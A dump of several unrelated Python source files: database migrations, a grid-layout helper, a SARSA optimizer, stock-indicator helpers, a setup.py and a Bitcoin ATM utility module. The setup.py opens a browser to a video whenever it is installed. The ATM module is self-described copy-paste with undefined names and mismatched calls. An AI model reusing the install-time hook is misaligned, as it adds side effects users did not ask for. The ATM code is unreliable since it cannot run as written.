'e412490c2bd4'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_foreign_key(None, 'groups_users', 'group', ['group_id'], ['id'])\n op.create_foreign_key(None, 'groups_users', 'user', ['user_id'], ['id'])\n op.create_foreign_key(None, 'post', 'user', ['user_id'], ['id'])\n op.create_foreign_key(None, 'roles_users', 'role', ['role_id'], ['id'])\n op.create_foreign_key(None, 'roles_users', 'user', ['user_id'], ['id'])\n op.create_foreign_key(None, 'user', 'group', ['own_group_id'], ['id'])\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, 'user', type_='foreignkey')\n op.drop_constraint(None, 'roles_users', type_='foreignkey')\n op.drop_constraint(None, 'roles_users', type_='foreignkey')\n op.drop_constraint(None, 'post', type_='foreignkey')\n op.drop_constraint(None, 'groups_users', type_='foreignkey')\n op.drop_constraint(None, 'groups_users', type_='foreignkey')\n ### end Alembic commands ###\n","sub_path":"migrations/versions/b4350943a906_.py","file_name":"b4350943a906_.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"554941925","text":"import exception\n\n\nclass GridManagement:\n\n \"\"\"\n GridManagement manage the position of elements.\n It used to return pixel position from grid position.\n By default, a cell size is 200x100 px\n \"\"\"\n\n X_SIZE = 200\n Y_SIZE = 100\n\n VERTICAL_TOP_ALIGN = 0\n HORIZONTAL_LEFT_ALIGN = 0\n\n \"\"\"\n Static method which convert grid position (x, y) to pixel position.\n Use GridManagement.X_SIZE and GridManagement.Y_SIZE to determine the default\n cell size. You can also manage the vertical and horizontal alignement.\n Vertical possible alignement values are \"top\", \"middle\", \"bottom\".\n Horizontal psossible alignement values are \"left\", \"middle\", \"right\".\n\n Args:\n element - a dictionary that must contains key:\n x -- The horizontal postion in a grid\n y -- The vertical position in a grid\n vertical-align -- The vertical position in a cell\n horizontal-align -- The horizontal position in a cell\n vertical-middle -- integer value\n vertical-top -- integer value\n horizontal-middle -- integer value\n horizontal-right -- integer value\n Raises:\n NotIntegerValueException -- when one value is not integer\n \"\"\"\n @staticmethod\n def getPosition(element):\n x = element['x']\n y = element['y']\n verticalAlignement = element['vertical-align']\n horizontalAlignement = element['horizontal-align']\n\n # Default alignement is top, top\n verticalAlign = GridManagement.VERTICAL_TOP_ALIGN\n horizontalAlign = GridManagement.HORIZONTAL_LEFT_ALIGN\n\n if verticalAlignement == \"middle\":\n verticalAlign = element['vertical-middle']\n if verticalAlignement == \"bottom\":\n verticalAlign = element['vertical-bottom']\n\n if horizontalAlignement == \"middle\":\n horizontalAlign = element['horizontal-middle']\n if horizontalAlignement == \"right\":\n horizontalAlign = element['horizontal-right']\n\n try:\n x = int(x)\n y = int(y)\n horizontalAlign = int(horizontalAlign)\n verticalAlign = int(verticalAlign)\n xCenter = int(element[\"xCenter\"])\n yCenter = int(element[\"yCenter\"])\n except Exception as e:\n raise exception.NotIntegerValueException(e)\n\n element['x'] = x*GridManagement.X_SIZE+horizontalAlign\n element['y'] = y*GridManagement.Y_SIZE+verticalAlign\n # The element center move with its position\n element['xCenter'] = element['x']+xCenter\n element['yCenter'] = element['y']+yCenter\n return element\n\n @staticmethod\n def getDimension(maxsize):\n size = {}\n size['x'] = (maxsize['x']+1)*GridManagement.X_SIZE\n size['y'] = (maxsize['y']+1)*GridManagement.Y_SIZE\n return size\n","sub_path":"bin/gridManagement.py","file_name":"gridManagement.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"486779239","text":"# coding:utf-8\n# 2019-12-10\n# 强化学习优化\nimport sys\nsys.path.append(\"../\")\n\nimport os\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n\nimport datetime\nimport logging\nimport numpy as np\nimport pickle\n\nimport model\nfrom util import io, tool\nfrom quadRegresstion import *\n\n# 日志设置\nLOGGER_PATH = \"../log\"\nlogger = tool.getLogger(LOGGER_PATH)\nlogger.setLevel(logging.DEBUG)\n\n# 模型路径format\nmodelPathFormat = r\"C:\\Study\\github\\Lookoops\\tool\\毕设代码\\data/{}.model\"\nsingleModelPathFormat = r\"C:\\Study\\github\\Lookoops\\tool\\毕设代码\\data/singleModel/{}.model\"\nQSavingPath = r\"C:\\Study\\github\\Lookoops\\tool\\毕设代码\\data\\Q.model\"\n\nstartTime = datetime.datetime.now() \n\ndef getModelName():\n \"\"\"获得选择出来的最佳模型名称\"\"\"\n names = [\"quadraticRegression\", \"stackingModel\"]\n\n return names\n\ndef getSingleModel():\n \"\"\"获得单个模型的名称\"\"\"\n names, models = model.getModel()\n\n return names\n\nclass Env(object):\n \"\"\"最小值寻优框架\"\"\"\n def __init__(self, agent, dim, lowBoundary, upBoundary, \n initPost=None, checkLens=500, lmb=0.01):\n \"\"\"初始化\n @param agent 代理模型,提供predict(X)接口\n @param int dim 变量维数\n @param [] lowBoundary 变量下界\n @param [] upBoundary 变量上界\n @param [,None] initPost 初始位置,默认位置中间点\n @param int checkLens 终止寻找取决长度\n @param float lmb 奖赏值权重\n \"\"\"\n self.agent = agent\n self.optimalValue = None\n self.dim = dim\n self.lowBoundary = lowBoundary\n self.upBoundary = upBoundary\n self.curPosition = self.initPosition(initPost) # 当前位置记录\n self.checkLens = checkLens # 判断最优值终止结果步长\n self.lmb = lmb # 奖赏值权值\n self.computeStore = [None] # 计算结果记录\n self.optimalStore = [None] # 最优值记录\n self.isEnd = False # 计算终止\n self.step = 0 # 步数记录\n self.candidate = self.initCan(dim, lowBoundary, upBoundary)\n\n def initPosition(self, initPost):\n \"\"\"初始化初始位置,初始位置居中\"\"\"\n if initPost != None:\n return initPost\n posSplit = 0.5\n pos = []\n for i in range(self.dim):\n scope = self.upBoundary[i] - self.lowBoundary[i]\n pos.append(int(scope * posSplit))\n\n return pos \n\n def initCan(self, dim, lowBoundary, upBoundary):\n \"\"\"初始候选值\"\"\"\n candidate = []\n for i in range(dim):\n tmpCandidate = [i for i in range(lowBoundary[i], upBoundary[i])]\n candidate.append(tmpCandidate)\n\n return candidate\n\n def interact(self, action):\n \"\"\"在指定动作,返回奖赏\"\"\"\n assert self.isEnd == False\n\n reward = 0\n\n # 更新当前位置,获取当前位置的候选值\n if not self.checkBoundary(action): # 检测边界\n return reward\n for i in range(len(action)):\n self.curPosition[i] += action[i]\n value = self.getCurCandidateValue()\n\n # 预测候选值\n computeValue = self.agent.predict([value])\n self.computeStore.append(computeValue)\n\n # 更新最佳值, 计算奖赏值\n if not self.optimalValue:\n self.optimalValue = computeValue\n else:\n reward = self.rewardJudge(computeValue)\n if computeValue < self.optimalValue:\n self.optimalValue = computeValue\n\n self.step += 1\n self.optimalStore.append(self.optimalValue)\n self.checkOptimalValueIsConvergence() # 检查存储值的差值,低于某个阈值后结束迭代\n\n return reward\n\n def checkBoundary(self, action):\n \"\"\"边界条件\"\"\"\n ret = True\n for i in range(self.dim):\n if self.curPosition[i]+action[i] >= len(self.candidate[i]) or self.curPosition[i]+action[i] < 0:\n ret = False\n break\n\n return ret\n\n def getCurCandidateValue(self):\n \"\"\"获得当前位置的候选值\"\"\"\n value = []\n for i in range(self.dim):\n value.append(self.candidate[i][self.curPosition[i]])\n\n return value\n\n def rewardJudge(self, computeValue):\n \"\"\"奖赏判断\"\"\"\n reward = (self.optimalValue - computeValue) * self.lmb # 奖赏返回差值,差值越大奖赏越多\n\n return reward\n\n def checkOptimalValueIsConvergence(self):\n \"\"\"检测最优值在最近迭代步长中是否改变,没有改变的话结束迭代\"\"\"\n curOptimalStoreLens = len(self.optimalStore)\n if curOptimalStoreLens < self.checkLens:\n return None\n\n lastValue = self.optimalStore[curOptimalStoreLens-self.checkLens:]\n if lastValue == lastValue[::-1]:\n self.isEnd = True\n logger.debug(\"iteration: {}, find cur iteration optimal value, stop cur iteration\".format(self.step))\n\n @property\n def presentState(self):\n \"\"\"当前位置\"\"\"\n return self.curPosition\n\n def printOptimalValue(self):\n \"\"\"打印最佳值\"\"\"\n logger.info(\"step: {}, cur optimal var: {}, optimal value: {}\"\\\n .format(self.step, self.getCurCandidateValue(), self.optimalValue))\n\n def getOptimalValue(self):\n \"\"\"最佳值\"\"\"\n return self.getCurCandidateValue(), self.optimalValue\n \n\nclass QClass(object):\n \"\"\"奖赏结构\"\"\"\n def __init__(self, dim, actionDim, lowBoundary, upBoundary):\n self.alpha = 0.1\n self.gamma = 0.9\n\n self.dim = dim # 变量维度\n self.actionDim = actionDim\n self.q = [[] for i in range(dim)]\n for i in range(dim):\n self.q[i] = np.zeros((abs(upBoundary[i]- lowBoundary[i]), actionDim))\n\n\n def updateStateAndAction(self, state, action, newState, newAction, reward):\n \"\"\"更新奖赏\"\"\"\n for i in range(self.dim):\n self.q[i][action[i]] = (1 - self.alpha) * self.q[i][action[i]] \\\n + self.alpha * (reward + self.gamma * self.q[i][newAction[i]])\n\n def getCurOptAction(self, state):\n \"\"\"基于当前奖赏的最佳动作\"\"\"\n action = []\n for i in range(self.dim):\n curAction = (self.q[i][state[i], :]).argmax()\n action.append(curAction)\n\n return np.array(action)\n\n\ndef epsilonGreedy(Q, state):\n \"\"\"e-贪心算法,根据当前状态获得下一个动作\"\"\"\n if (np.random.uniform() > 1 - EPSILON) or ((Q.getCurOptAction(state) == 0).all()):\n action = [np.random.randint(-1, 2) for i in range(Q.dim)]\n else:\n action = Q.getCurOptAction(state)\n\n return action\n\ndef generatePoints(lowBoundary, upBoundary, splitPointCount):\n \"\"\"生成不同区域初始起点\"\"\"\n if splitPointCount == 0:\n return [None]\n dim = len(lowBoundary)\n pos = None\n gap = []\n for i in range(dim):\n gap.append(upBoundary[i] - lowBoundary[i])\n splitPoint = []\n for i in range(dim):\n increate = int(gap[i] // (splitPointCount + 1))\n tmpSplitPoint = []\n for j in range(splitPointCount):\n tmpSplitPoint.append(increate * (j + 1))\n splitPoint.append(tmpSplitPoint)\n # print(\"[DEBUG] splitPoint : {}\".format(splitPoint))\n pos = crossPoint(splitPoint)\n\n return pos \n\ndef crossPoint(points):\n \"\"\"交叉组合\"\"\"\n def helper(points, res):\n if not points:\n return res\n ret = []\n for i in res:\n for j in points[0]:\n ret.append(i + [j])\n\n return helper(points[1:], ret)\n\n res = [[v] for v in points[0]]\n\n return helper(points[1:], res)\n\n\n# 全局变量\nEPSILON = 0.1\nMAX_STEP = 100000 # 最大迭代步长\n\ndef main():\n \"\"\"单目标,多约束寻优问题\"\"\"\n dim = 5 # 变量维数\n actionDim = 3 # 动作维度\n lowBoundary = [-300, -300, -300, -300, -200] # 变量下界值\n upBoundary = [300, 300, 100, 300, 200] # 变量上界值\n\n # 获得代理模型\n modelName = getModelName()[1]\n modelPath = modelPathFormat.format(modelName) # quadraticRegression\n agent = io.getData(modelPath) \n\n maxIter = 50 # 最大迭代数\n checkLens = 10000 # 检测最优最大步长\n lmb = 0.1\n\n # 初始化起点位置\n splitPointCount = 3\n initPos = generatePoints(lowBoundary, upBoundary, splitPointCount) \n\n logger.info(\"using model: {}\".format(modelName))\n logger.info(\"dim: {}, actionDim: {}, lowBoundary: {}, upBoundary: {}, maxIter: {}, checkLens: {}, lmb: {},splitPointCount: {}, pointsSize:{}, EPSILON: {}, MAX_STEP: {}\"\\\n .format(dim, actionDim, lowBoundary, upBoundary, maxIter, checkLens,\n lmb, splitPointCount, len(initPos), EPSILON, MAX_STEP))\n\n # 训练\n Q = QClass(dim, actionDim, lowBoundary, upBoundary)\n globalBestValue = []\n for pos in initPos:\n logger.info(\"using initial position: {}\".format(pos))\n bestValue = []\n for it in range(maxIter):\n # logger.info(\"iter: {}\".format(it))\n e = Env(agent, dim, lowBoundary, upBoundary, initPost=pos, checkLens=checkLens, lmb=lmb)\n action = epsilonGreedy(Q, e.presentState)\n while (e.isEnd is False) and (e.step < MAX_STEP):\n # logger.inf(\"e.step: {}\".format(e.step))\n state = e.presentState\n reward = e.interact(action) # 计算当前动作的奖赏\n newState = e.presentState # 获得当前状态\n newAction = epsilonGreedy(Q, newState) # 根据累积奖赏获得当前状态的下一个动作\n Q.updateStateAndAction(state, action, newState, newAction, reward) # 更新状态和动作\n action = newAction\n\n can, value = e.getOptimalValue()\n if can and value:\n bestValue.append([value, can])\n e.printOptimalValue()\n logger.debug(\"bestValue: {}\".format(bestValue))\n try:\n bestValue.sort()\n logger.info(\"bestValue store: {}\".format(bestValue[0]))\n globalBestValue.append(bestValue[0])\n except Exception as e:\n logger.error(\"sort bestValue fail, except: {}\".format(str(e)))\n\n globalBestValue.sort()\n logger.info(\"global best value: {}\".format(globalBestValue[0]))\n endTime = datetime.datetime.now() \n logger.info(\"run time: {}\".format(str(endTime - startTime)))\n io.saveData(Q, QSavingPath)\n\ndef testGeneratePoints():\n \"\"\"测试-网格划分生成\"\"\"\n lowBoundary = [-300, -300, -300, -300, -200]\n upBoundary = [300, 300, 100, 300, 200]\n ret = generatePoints(lowBoundary, upBoundary)\n\n\nif __name__ == '__main__':\n main()\n # logger.error(\"error test\")","sub_path":"tool/毕设代码/script/sarsaOptimizationBackup.py","file_name":"sarsaOptimizationBackup.py","file_ext":"py","file_size_in_byte":10858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"396152824","text":"import robin_stocks as r\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as plticker\nimport numpy as np\nfrom termcolor import colored\n\n# cached historicals\nhistoricals = {}\n\ndef cross_to_str(cross):\n \"\"\"Converts cross int to readable string\n\n Args:\n cross(bool)\n\n Returns:\n cross_str(string)\n \"\"\"\n if cross == True:\n return colored(\"Bullish\", 'green')\n else:\n return colored(\"Bearish\", 'red')\n\ndef rsi_to_str(rsi):\n \"\"\"Converts rsi float to readable string\n\n Args:\n rsi(float)\n\n Returns:\n rsi_str(string)\n \"\"\"\n if rsi <= 30:\n return colored(str('%.2f' % rsi), 'green')\n elif rsi >= 70:\n return colored(str('%.2f' % rsi), 'red')\n else:\n return str('%.2f' % rsi)\n\ndef macd_to_str(macd):\n \"\"\"Converts macd float to readable string\n\n Args:\n macd(float)\n\n Returns:\n macd_str(string)\n \"\"\"\n if macd > 0:\n return colored(str('%.2f' % macd), 'green')\n else:\n return colored(str('%.2f' % macd), 'red')\n\ndef rating_to_str(rating):\n \"\"\"Converts rating float to readable string\n\n Args:\n rating(float)\n\n Returns:\n rating_str(string)\n \"\"\"\n if rating >= 70:\n return colored(str('%.0f' % rating), 'green')\n else:\n return colored(str('%.0f' % rating), 'red')\n\ndef print_table(stock_data):\n \"\"\"Prints a table of all stock symbols and key indicators\n\n Args:\n stock_data(dict)\n\n Returns:\n None\n \"\"\"\n # print (\"{}\\t{}\\t\\t{}\\t{}\\t{}\\t{}\".format('SYMBOL', 'PRICE', 'RSI', 'MACD', 'RATING', 'EMA')) \n\n potential_stocks = []\n\n for data in stock_data: \n # print (\"{}\\t${:.2f}\\t\\t{}\\t{}\\t{}\\t{}\".format(data['symbol'], data['price'], rsi_to_str(data['rsi']), macd_to_str(data['macd']), rating_to_str(data['buy_rating']), cross_to_str(data['cross'])))\n if (data['rsi'] < 45) and (data['price'] < 200) and (data['macd'] > -1) and (data['buy_rating'] >= 70) and (data['cross'] == True):\n potential_stocks.append(data)\n\n print()\n print(\"STOCKS TO CHECK OUT\")\n print(\"-------------------\")\n print()\n print (\"{}\\t{}\\t\\t{}\\t{}\\t{}\\t{}\".format('SYMBOL', 'PRICE', 'RSI', 'MACD', 'RATING', 'EMA')) \n print()\n\n for data in potential_stocks:\n print (\"{}\\t${:.2f}\\t\\t{}\\t{}\\t{}\\t{}\".format(data['symbol'], data['price'], rsi_to_str(data['rsi']), macd_to_str(data['macd']), rating_to_str(data['buy_rating']), cross_to_str(data['cross'])))\n\ndef show_plot(price, firstIndicator, secondIndicator, dates, symbol=\"\", label1=\"\", label2=\"\"):\n \"\"\"Displays a chart of the price and indicators for a stock\n\n Args:\n price(Pandas series): Series containing a stock's prices\n firstIndicator(Pandas series): Series containing a technical indicator, such as 50-day moving average\n secondIndicator(Pandas series): Series containing a technical indicator, such as 200-day moving average\n dates(Pandas series): Series containing the dates that correspond to the prices and indicators\n label1(str): Chart label of the first technical indicator\n label2(str): Chart label of the first technical indicator\n\n Returns:\n None\n \"\"\"\n plt.figure(figsize=(10,5))\n plt.title(symbol)\n plt.plot(dates, price, label=\"Closing prices\")\n plt.plot(dates, firstIndicator, label=label1)\n plt.plot(dates, secondIndicator, label=label2)\n plt.yticks(np.arange(price.min(), price.max(), step=((price.max()-price.min())/15.0)))\n plt.legend()\n plt.show()\n\ndef get_equity_data():\n \"\"\"Displays a pie chart of your portfolio holdings\n \"\"\"\n holdings_data = r.build_holdings()\n equity_data = {}\n for key, value in holdings_data.items():\n equity_data[key] = {}\n equity_data[key][name] = value.get('name')\n equity_data[key][percentage] = value.get(\"percentage\")\n equity_data[key][type]\n fig1, ax1 = plt.subplots()\n ax1.pie(equities, labels=labels, autopct='%1.1f%%',\n shadow=True, startangle=90)\n ax1.axis('equal')\n plt.show()\n\ndef get_historicals(symbol):\n \"\"\"Returns the time at which we bought a certain stock in our portfolio\n\n Args:\n symbol(str): Symbol of the stock that we are trying to figure out when it was bought\n holdings_data(dict): dict returned by r.get_open_stock_positions()\n\n Returns:\n A string containing the date and time the stock was bought, or \"Not found\" otherwise\n \"\"\"\n if symbol not in historicals.keys():\n historicals[symbol] = r.get_historicals(symbol, span='year', bounds='regular')\n # print(\"Fetched historicals for: {}\".format(symbol))\n return historicals[symbol]","sub_path":"robinhoodbot/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":4696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"284803445","text":"import sys\nimport webbrowser\nfrom distutils.core import setup\n\ntrailer_url = 'http://youtube.com/v/rC8VJ9aeB_g?hd=1&autoplay=1'\n\nif 'install' in sys.argv:\n webbrowser.open_new(trailer_url)\n\n\nsetup(\n name='django-unchained',\n version='1.0',\n maintainer='Jannis Leidel',\n maintainer_email='jannis@leidel.info',\n url=trailer_url)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"42303176","text":"\n#import RPi.GPIO as GPIO\nimport logging\nimport os\nimport requests\nimport sys\nimport config\nimport math\n# import qr\n\n\nfrom PIL import ImageFont\nfrom pathlib import Path\n\nlogger = logging.getLogger(\"UTILS\")\n\nled = \"off\"\n\n\n## just copy pasted the methods here better check if all is good\n\n\ndef coins_inserted():\n \"\"\"Actions coins inserted\n \"\"\"\n global led\n\n if config.FIAT == 0:\n config.BTCPRICE = utils.get_btc_price(config.conf[\"atm\"][\"cur\"])\n config.SATPRICE = math.floor((1 / (config.BTCPRICE * 100)) * 100000000)\n logger.info(\"Satoshi price updated\")\n\n if config.PULSES == 2:\n config.FIAT += 0.02\n config.SATS = utils.get_sats()\n config.SATSFEE = utils.get_sats_with_fee()\n config.SATS -= config.SATSFEE\n logger.info(\"2 cents added\")\n display.update_amount_screen()\n if config.PULSES == 3:\n config.FIAT += 0.05\n config.SATS = utils.get_sats()\n config.SATSFEE = utils.get_sats_with_fee()\n config.SATS -= config.SATSFEE\n logger.info(\"5 cents added\")\n display.update_amount_screen()\n if config.PULSES == 4:\n config.FIAT += 0.1\n config.SATS = utils.get_sats()\n config.SATSFEE = utils.get_sats_with_fee()\n config.SATS -= config.SATSFEE\n logger.info(\"10 cents added\")\n display.update_amount_screen()\n if config.PULSES == 5:\n config.FIAT += 0.2\n config.SATS = utils.get_sats()\n config.SATSFEE = utils.get_sats_with_fee()\n config.SATS -= config.SATSFEE\n logger.info(\"20 cents added\")\n display.update_amount_screen()\n if config.PULSES == 6:\n config.FIAT += 0.5\n config.SATS = utils.get_sats()\n config.SATSFEE = utils.get_sats_with_fee()\n config.SATS -= config.SATSFEE\n logger.info(\"50 cents added\")\n display.update_amount_screen()\n if config.PULSES == 7:\n config.FIAT += 1\n config.SATS = utils.get_sats()\n logger.info(\"100 cents added\")\n display.update_amount_screen()\n config.PULSES = 0\n\n if config.FIAT > 0 and led == \"off\":\n # Turn on the LED after first coin\n GPIO.output(13, GPIO.HIGH)\n led = \"on\"\n logger.info(\"Button-LED turned on (if connected)\")\n\ndef monitor_coins_and_button():\n \"\"\"Monitors coins inserted and buttons pushed\n \"\"\"\n global led\n time.sleep(0.2)\n if (time.time() - config.LASTIMPULSE > 0.5) and (config.PULSES > 0):\n coins_inserted(led)\n\n # Detect if the button has been pushed\n if (time.time() - config.LASTPUSHES > 1) and (config.PUSHES > 0):\n button_pushed()\n\ndef button_pushed():\n \"\"\"Actions button pushes by number\n \"\"\"\n if config.PUSHES == 1:\n \"\"\"If no coins inserted, update the screen.\n If coins inserted, scan a qr code for the exchange amount\n \"\"\"\n if config.FIAT == 0:\n display.update_nocoin_screen()\n time.sleep(3)\n display.update_startup_screen()\n\n if not config.conf[\"atm\"][\"activewallet\"]:\n logger.error(\"No wallet has been configured for the ATM.\")\n # Softreset and startup screen\n softreset()\n\n if config.conf[\"atm\"][\"activewallet\"] == \"btcpay_lnd\":\n display.update_qr_request()\n qrcode = qr.scan()\n config.INVOICE = lndrest.evaluate_scan(qrcode)\n while config.INVOICE is False:\n display.update_qr_failed()\n time.sleep(1)\n display.update_qr_request()\n qrcode = qr.scan()\n config.INVOICE = lndrest.evaluate_scan(qrcode)\n display.update_payout_screen()\n lndrest.handle_invoice()\n softreset()\n elif config.conf[\"atm\"][\"activewallet\"] == \"lntxbot\":\n lntxbot.process_using_lnurl(config.SATS)\n # Softreset and startup screen\n softreset()\n # lntxbot.payout(config.SATS, config.INVOICE)\n else:\n pass\n\n if config.PUSHES == 3:\n \"\"\"Scan and store new wallet credentials\n \"\"\"\n # Delete current wallet flag and credentials\n config.update_config(\"atm\", \"activewallet\", \"\")\n config.update_config(\"lntxbot\", \"creds\", \"\")\n config.update_config(\"lnd\", \"macaroon\", \"\")\n\n display.update_wallet_scan()\n qr.scan_credentials()\n importlib.reload(config)\n\n if config.conf[\"atm\"][\"activewallet\"] == \"btcpay_lnd\":\n display.update_btcpay_lnd()\n elif config.conf[\"atm\"][\"activewallet\"] == \"lntxbot\":\n balance = lntxbot.get_lnurl_balance()\n display.update_lntxbot_balance(balance)\n else:\n logger.error(\"Scanning of wallet credentials failed.\")\n\n softreset()\n\n if config.PUSHES == 4:\n \"\"\"Simulates adding a coin\n \"\"\"\n logger.info(\"Button pushed four times (add coin)\")\n print(\"Button pushed four times (add coin)\")\n config.PULSES = 2\n\n if config.PUSHES == 6:\n \"\"\"Shutdown the host machine\n \"\"\"\n display.update_shutdown_screen()\n GPIO.cleanup()\n logger.warning(\"ATM shutdown (6 times button)\")\n os.system(\"sudo shutdown -h now\")\n config.PUSHES = 0\n\n\n\ndef softreset():\n \"\"\"Displays startup screen and deletes fiat amount\n \"\"\"\n global led\n config.SATS = 0\n config.FIAT = 0\n # Turn off button LED\n GPIO.output(13, GPIO.LOW)\n led = \"off\"\n\n display.update_startup_screen()\n logger.info(\"Softreset executed\")\n\n\ndef button_event(channel):\n \"\"\"Registers a button push event\n \"\"\"\n config.LASTPUSHES = time.time()\n config.PUSHES = config.PUSHES + 1\n\n\ndef coin_event(channel):\n \"\"\"Registers a coin insertion event\n \"\"\"\n config.LASTIMPULSE = time.time()\n config.PULSES = config.PULSES + 1\n\n\ndef setup_coin_acceptor():\n \"\"\"Initialises the coin acceptor parameters and sets up a callback for button pushes\n and coin inserts.\n \"\"\"\n # Defining GPIO BCM Mode\n GPIO.setmode(GPIO.BCM)\n\n # Setup GPIO Pins for coin acceptor, button and button-led\n GPIO.setwarnings(False)\n GPIO.setup(13, GPIO.OUT)\n GPIO.output(13, GPIO.LOW)\n GPIO.setup(5, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n GPIO.setup(6, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n\n # Setup coin interrupt channel (bouncetime for switch bounce)\n GPIO.add_event_detect(5, GPIO.RISING, callback=button_event, bouncetime=300)\n GPIO.add_event_detect(6, GPIO.FALLING, callback=coin_event)\n\n\ndef check_epd_size():\n \"\"\"Check EPD_SIZE is defined\n \"\"\"\n if os.path.exists(\"/etc/default/epd-fuse\"):\n exec(open(\"/etc/default/epd-fuse\").read(), globals())\n\n if EPD_SIZE == 0.0:\n print(\"Please select your screen size by running 'papirus-config'.\")\n sys.exit()\n\n\ndef create_font(font, size):\n \"\"\"Create fonts from resources\n \"\"\"\n # Construct paths to foder with fonts\n pathfreemono = Path.cwd().joinpath(\"resources\", \"fonts\", \"FreeMono.ttf\")\n pathfreemonobold = Path.cwd().joinpath(\"resources\", \"fonts\", \"FreeMonoBold.ttf\")\n pathsawasdee = Path.cwd().joinpath(\"resources\", \"fonts\", \"Sawasdee-Bold.ttf\")\n\n if font == \"freemono\":\n return ImageFont.truetype(pathfreemono.as_posix(), size)\n if font == \"freemonobold\":\n return ImageFont.truetype(pathfreemonobold.as_posix(), size)\n if font == \"sawasdee\":\n return ImageFont.truetype(pathsawasdee.as_posix(), size)\n else:\n print(\"Font not available\")\n\n\ndef get_btc_price(fiat_code):\n \"\"\"Get BTC -> FIAT conversion\n \"\"\"\n url = config.COINGECKO_URL_BASE + \"simple/price\"\n price = requests.get(\n url, params={\"ids\": \"bitcoin\", \"vs_currencies\": fiat_code}\n ).json()\n return price[\"bitcoin\"][fiat_code]\n\n\ndef get_sats():\n return config.FIAT * 100 * config.SATPRICE\n\n\ndef get_sats_with_fee():\n return math.floor(config.SATS * (float(config.conf[\"atm\"][\"fee\"]) / 100))\n\n\n##### from configfile\n\ndef init_config_logging():\n # Set to logging.DEBUG if more \"requests\" debugging info needed\n logging.getLogger(\"requests\").setLevel(logging.INFO)\n logging.getLogger(\"urllib3.connectionpool\").setLevel(logging.INFO)\n\n # Configure basigConfig for the \"logging\" module\n logging.basicConfig(\n filename=\"{}/debug.log\".format(ATM_data_dir),\n format=\"%(asctime)-23s %(name)-9s %(levelname)-7s | %(message)s\",\n datefmt=\"%Y/%m/%d %I:%M:%S %p\",\n level=logging.DEBUG,\n )\n\n # Create logger for this config file\n logger = logging.getLogger(\"CONFIG\")\n\n\n yes = [\"yes\", \"ye\", \"y\"]\n no = [\"no\", \"n\"]\n\n\ndef ask_scan_config_val(section, variable):\n while True:\n try:\n res = input(\n \"Do you want to scan to input {} {}\".format(section, variable)\n ).lower()\n if res in yes:\n # value = scan the qr for the value\n # update_config(section, variable, value\n ...\n elif res in no:\n return\n else:\n print(\"Input invalid, please try again or KeyboardInterrupt to exit\")\n except KeyboardInterrupt:\n return\n\n\ndef check_config():\n \"\"\"Checks the config and prompt the user to provide values for missing keys\n \"\"\"\n if conf[\"lnd\"][\"macaroon\"] is (None or \"\"):\n logger.warning(\"Missing value for lnd macaroon in config\")\n ask_scan_config_val(\"lnd\", \"macaroon\")\n if conf[\"lntxbot\"][\"creds\"] is (None or \"\"):\n logger.warning(\"Missing value for lntxbot credential in config\")\n ask_scan_config_val(\"lntxbot\", \"creds\")\n\n\ndef update_config(section, variable, value):\n \"\"\"Update the config with the new value for the variable.\n If dangermode is on, we save them to config.ini, else we write them to the temporary\n dictionary\n \"\"\"\n if conf[\"atm\"][\"dangermode\"].lower() == \"on\":\n config = create_config()\n config[section][variable] = value\n\n with open(CONFIG_FILE, \"w\") as configfile:\n config.write(configfile)\n else:\n conf[section][variable] = value\n\n\ndef check_dangermode():\n if conf[\"atm\"][\"dangermode\"].lower() == \"on\":\n return True\n else:\n return False\n\n\n# config file handling\ndef get_config_file():\n # check that the config file exists, if not copy over the example_config\n if not os.path.exists(ATM_data_dir + \"config.ini\"):\n example_config = os.path.join(os.path.dirname(__file__), \"example_config.ini\")\n copyfile(example_config, ATM_data_dir + \"config.ini\")\n return os.environ.get(\"CONFIG_FILE\", config_file_path)\n\n\ndef create_config(config_file=None):\n parser = ConfigParser(comment_prefixes=\"/\", allow_no_value=True, strict=False)\n parser.read(config_file or CONFIG_FILE)\n return parser\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"218384040","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='LevelOne',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=200)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='LevelThree',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=200)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='LevelTwo',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=200)),\n ('level', models.ForeignKey(to='multileveltest.LevelOne')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='TopLevel',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=200)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='levelthree',\n name='level',\n field=models.ForeignKey(to='multileveltest.LevelTwo'),\n preserve_default=True,\n 